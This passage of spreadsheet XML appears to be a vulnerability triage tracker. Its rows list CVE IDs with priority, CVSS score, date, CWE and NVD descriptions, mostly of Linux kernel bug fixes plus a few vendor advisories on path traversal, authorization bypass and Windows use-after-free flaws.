          <t>CVE-2026-89571</t>
        </is>
      </c>
      <c r="D558" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F558" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr"/>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr"/>
      <c r="Q558" s="5" t="inlineStr"/>
      <c r="R558" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/features: bound fwctl command payload to the input buffer
fwctl_cmd_rpc() copies cmd-&gt;in_len bytes into inbuf = kvzalloc(cmd-&gt;in_len)
and passes inbuf and in_len to -&gt;fw_rpc(). The CXL callback cxlctl_fw_rpc()
ignores in_len and never checks the user-controlled op_size against it.
cxlctl_set_feature() bounds op_size only from below
(op_size &lt;= sizeof(feat_in-&gt;hdr)) and then reads op_size - sizeof(hdr)
bytes from feat_in-&gt;feat_data via cxl_set_feature(). With a small in_len
and a large op_size the first memcpy() already reads past the
kvzalloc(in_len) buffer; the out-of-bounds bytes are placed in the mailbox
payload and sent to the device, and a large enough op_size can walk into
unmapped memory and oops the kernel. The Get paths pin op_size to a fixed
size but likewise read the input struct without checking in_len.
Reject, at the single dispatch point, any request whose fixed header plus
op_size does not fit in the copied-in buffer. The lower-bound test guards
the subtraction and ensures op_size was copied in before it is read.</t>
        </is>
      </c>
      <c r="S558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89571</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89593</t>
        </is>
      </c>
      <c r="D559" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F559" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr"/>
      <c r="Q559" s="5" t="inlineStr"/>
      <c r="R559" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hugetlb: only adjust reservation during unmapping if mapcount is 0
Since df7a6d1f6405, __unmap_hugepage_range can adjust reservations.  In
the case of folio mapped in both a parent and a child, if the parent
unmaps the range first, the reservation adjustment will result in an
underflow of the reserved count.  Once the child unmaps the range, the
count is restored.  Change __unmap_hugepage_range() to check the mapcount
before adjusting the reservation.</t>
        </is>
      </c>
      <c r="S559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89593</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89596</t>
        </is>
      </c>
      <c r="D560" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F560" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr"/>
      <c r="Q560" s="5" t="inlineStr"/>
      <c r="R560" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
forcedeth: fix off-by-one when saving/restoring non-PCI config space
nv_suspend() and nv_resume() walk the non-PCI configuration space with
	for (i = 0; i &lt;= np-&gt;register_size/sizeof(u32); i++)
which runs one iteration too many. saved_config_space is declared as
	u32 saved_config_space[NV_PCI_REGSZ_MAX/4];
and NV_PCI_REGSZ_VER3 is equal to NV_PCI_REGSZ_MAX (0x604), so on a VER3
device register_size/sizeof(u32) is exactly the array length and the last
iteration addresses one element past the end.
The element it lands on is np-&gt;name_rx[0..3]: saved_config_space[] is
followed immediately by char name_rx[IFNAMSIZ + 3], and char needs no
padding. Nothing observable is corrupted by that, because nv_request_irq()
rewrites name_rx with sprintf() before it is ever passed to request_irq().
The bug is the out-of-bounds access itself, which UBSAN reports and which
CONFIG_UBSAN_TRAP=y turns into a trap that aborts the running kernel code,
plus an MMIO read and, on resume, an MMIO writel() to base + 0x604, one
dword past the range the driver mapped:
	np-&gt;base = ioremap(addr, np-&gt;register_size);
VER1 and VER2 devices stay inside the array, but they too get the stray
read and the stray write one dword past their own window.
Caught by UBSAN on an Apple Macmini3,1 (MCP79) during a deep S3 cycle.
The splat below is trimmed: the build path in the file name, the CPU
and taint lines, the Workqueue line, the "?" hint frames, and the
frames below device_suspend are all cut. The kernel was tainted, with
an out-of-tree nouveau and CPU_OUT_OF_SPEC; forcedeth itself was the
stock module.
  UBSAN: array-index-out-of-bounds in drivers/net/ethernet/nvidia/forcedeth.c:6225:25
  index 385 is out of range for type 'u32 [385]'
  Call Trace:
   dump_stack_lvl+0x5d/0x80
   ubsan_epilogue+0x5/0x2b
   __ubsan_handle_out_of_bounds.cold+0x54/0x59
   __this_module+0xe398c/0xe9010 [forcedeth]
   pci_pm_suspend+0x80/0x170
   dpm_run_callback+0x51/0x160
   device_suspend+0x1a2/0x4a0
   ...
Both loops are hit. UBSAN reports each source location only once per module
load (__ubsan_handle_out_of_bounds() calls suppress_report(), which does
test_and_set_bit(REPORTED_BIT, ...) on the struct source_location), so the
two splats land in the first S3 cycle after the module is loaded and later
cycles are silent even though the access still runs off the end every time.
In that first cycle line 6225 is reported from pci_pm_suspend and line 6240
from pci_pm_resume.
The same off-by-one was fixed in nv_get_regs() by commit ba9aa134287f
("forcedeth: fix buffer overflow") in 2012; these two loops were missed.
The suspend and resume side was reported on LKML in September 2013 by Marc
Weber, with the same analysis and the same one-character fix, but the patch
was attached rather than sent inline and the thread ended there.
Use &lt; instead of &lt;=, which saves and restores exactly register_size bytes.</t>
        </is>
      </c>
      <c r="S560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89596</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89608</t>
        </is>
      </c>
      <c r="D561" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F561" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr"/>
      <c r="Q561" s="5" t="inlineStr"/>
      <c r="R561" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: pass packet set buffer size to parser
ecryptfs_parse_packet_set() receives a pointer into the file header, but
it calculates the remaining packet buffer size from PAGE_SIZE - 8.  For
version 1 headers the packet set starts later in the header, so this can
overstate the available buffer.
Pass the actual packet set buffer length from the caller and calculate
per-packet limits from the remaining bytes in that buffer.  Recompute the
remaining length after consuming a tag 3 packet before parsing the
following tag 11 packet.</t>
        </is>
      </c>
      <c r="S561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89608</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89639</t>
        </is>
      </c>
      <c r="D562" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F562" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr"/>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr"/>
      <c r="Q562" s="5" t="inlineStr"/>
      <c r="R562" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cifs: use cifs_invalidate_cache() in cifs_do_truncate() for O_TRUNC
cifs_do_truncate() is invoked from cifs_open() without i_rwsem, so it
cannot use cifs_resize_file_locked() to perform a proper fscache cookie
resize.  Instead, add cifs_invalidate_cache() after cifs_setsize().
cifs_invalidate_cache() calls fscache_invalidate(), which works without
holding i_rwsem: it unconditionally increments inval_counter and sets
FSCACHE_COOKIE_NO_DATA_TO_READ, ensuring that stale cached data is not
served once the cookie is later activated by fscache_use_cookie().
Truncation to zero leaves no valid cached data, making invalidation the
correct semantic here.</t>
        </is>
      </c>
      <c r="S562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89639</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89640</t>
        </is>
      </c>
      <c r="D563" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F563" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr"/>
      <c r="Q563" s="5" t="inlineStr"/>
      <c r="R563" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cifs: fix loff_t underflow in cifs_remap_file_range() when len == 0
With len == 0 (clone to EOF), the effective length is computed as:
    len = src_inode-&gt;i_size - off;
If off &gt; i_size, this is a negative loff_t, corrupting the ByteCount
in the FSCTL_DUPLICATE_EXTENTS_TO_FILE request and inverting the range
in filemap_write_and_wait_range().  The existing off &gt;= i_size check
fires only after the ioctl has already been sent.
Snapshot i_size_read() once for both the bounds check and the length
calculation, eliminating the TOCTOU and 32-bit torn-read risk.  Reject
off &gt; src_size with -EINVAL.  Treat off == src_size as a no-op,
consistent with __generic_remap_file_range_prep().</t>
        </is>
      </c>
      <c r="S563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89640</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89691</t>
        </is>
      </c>
      <c r="D564" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F564" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr"/>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: clear opcnt on compound arg release to prevent OOB read
nfsd4_release_compoundargs() resets args-&gt;ops to the inline iops[8]
array when the dynamically-allocated ops buffer is freed, but leaves
args-&gt;opcnt at its original value (which can be up to 200 for NFSv4.1+
compounds).
If rq_status_counter is stuck at an odd value (which can happen when
nfsd_dispatch() hits an error path after setting it odd), the RPC
status dumpit handler reads min(opcnt, 16) entries from args-&gt;ops[].
Since iops only has 8 elements and is the last field in struct
nfsd4_compoundargs, reading indices 8-15 accesses adjacent slab memory
and leaks it to userspace via netlink.
Zero opcnt unconditionally in nfsd4_release_compoundargs() so stale
compound metadata is never exposed through the status interface.
[ cel: Remove the kvfree_rcu_mightsleep() sleep from the exposure window ]</t>
        </is>
      </c>
      <c r="S564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89691</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89705</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr"/>
      <c r="Q565" s="5" t="inlineStr"/>
      <c r="R565" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: restore rq_status_counter to even on all nfsd_dispatch() exit paths
nfsd_dispatch() sets rq_status_counter to an odd value once a request has
been decoded, and back to an even value once it has been fully processed,
forming a seq-lock like protocol with the lockless reader in
nfsd_nl_rpc_status_get_dumpit().
Only the fully successful path restored the counter to even. The cache-hit
(RC_REPLY), drop (RC_DROPIT / RQ_DROPME) and encode-error paths all return
after the odd-valued store without ever bringing the counter back to even.
Once one of those paths is taken, rq_status_counter is left odd: the next
request's decode ORs in 1 (still odd) and only a subsequent successful
encode restores even. While stuck odd, the dumpit reader treats the rqstp
fields as stable and its retry check compares against the same unchanging
odd value, so it never detects concurrent mutation. This exposes actively
mutating fields (e.g. args-&gt;ops / args-&gt;opcnt during compound decode and
release) to the lockless reader, which can read past the end of the
8-element inline ops array.
Add a helper that advances the counter to the next even value and call it
on every return path that follows the odd-valued store. The decode-error
path is left untouched as it is reached before the counter is set odd.</t>
        </is>
      </c>
      <c r="S565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89705</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89731</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr"/>
      <c r="Q566" s="5" t="inlineStr"/>
      <c r="R566" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/ras: Fix cxl_rch_get_aer_info() out-of-bounds AER register read
cxl_rch_get_aer_info() copies the RCH Downstream Port AER capability from
the RCRB MMIO block using a readl() loop bounded by sizeof(struct
aer_capability_regs). This struct is a software layout and its embedded
struct pcie_tlp_log is larger than the on-wire AER capability. As a
result the loop reads past the mapped AER register block.
The over-read also populates the software-only tail fields including
header_log.header_len. An out-of-range header_len passed to
pcie_print_tlp_log() can then loop past the header log buffer and cause
a second out-of-bounds read.
The read was correct when introduced, but struct pcie_tlp_log has since
grown (Header Log and TLP Prefix Log sizes, header_len and flit fields),
so sizeof(struct aer_capability_regs) no longer matches the physical AER
capability.
Bound the read to the physical AER registers, header through the 16 byte
Header Log. Zero the destination first so the software-only fields are
deterministic.</t>
        </is>
      </c>
      <c r="S566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89731</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90445</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr"/>
      <c r="Q567" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>An interface that accepts file uploads from authenticated users extracts the contents of uploaded archives without validating that extracted file paths remain within the intended destination directory. This allows an authenticated attacker to craft an archive whose entries traverse outside the destination directory, causing the extraction process to write files to arbitrary locations with the privileges of that process. This could allow an attacker to inject fabricated records into the system's stored data or tamper with application configuration.</t>
        </is>
      </c>
      <c r="S567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90445</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90447</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr"/>
      <c r="Q568" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>A routing rule selects between two different authentication mechanisms for the same downstream service based on the value of a client-supplied request header, rather than on any property the client cannot control. An authenticated user in possession of a shared service credential can set this header to route around the primary role-based authorization check and reach the alternate path's fixed, elevated role instead. This allows a low-privileged authenticated attacker who knows the shared credential to perform actions reserved for a higher-privileged role.</t>
        </is>
      </c>
      <c r="S568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90447</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90448</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr"/>
      <c r="Q569" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>A deployment mode intended to expose only read access to stored data proxies a set of application programming interface routes without restricting which request methods are allowed. One such route accepts a request that creates or overwrites a stored record, including an attacker-chosen identifier, using the application's own elevated backend credentials. This allows an authenticated user on a deployment intended to be read-only to forge or overwrite stored records that should not be modifiable in that deployment mode.</t>
        </is>
      </c>
      <c r="S569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90448</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69472</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr"/>
      <c r="Q570" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69573</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr"/>
      <c r="Q571" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R571" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
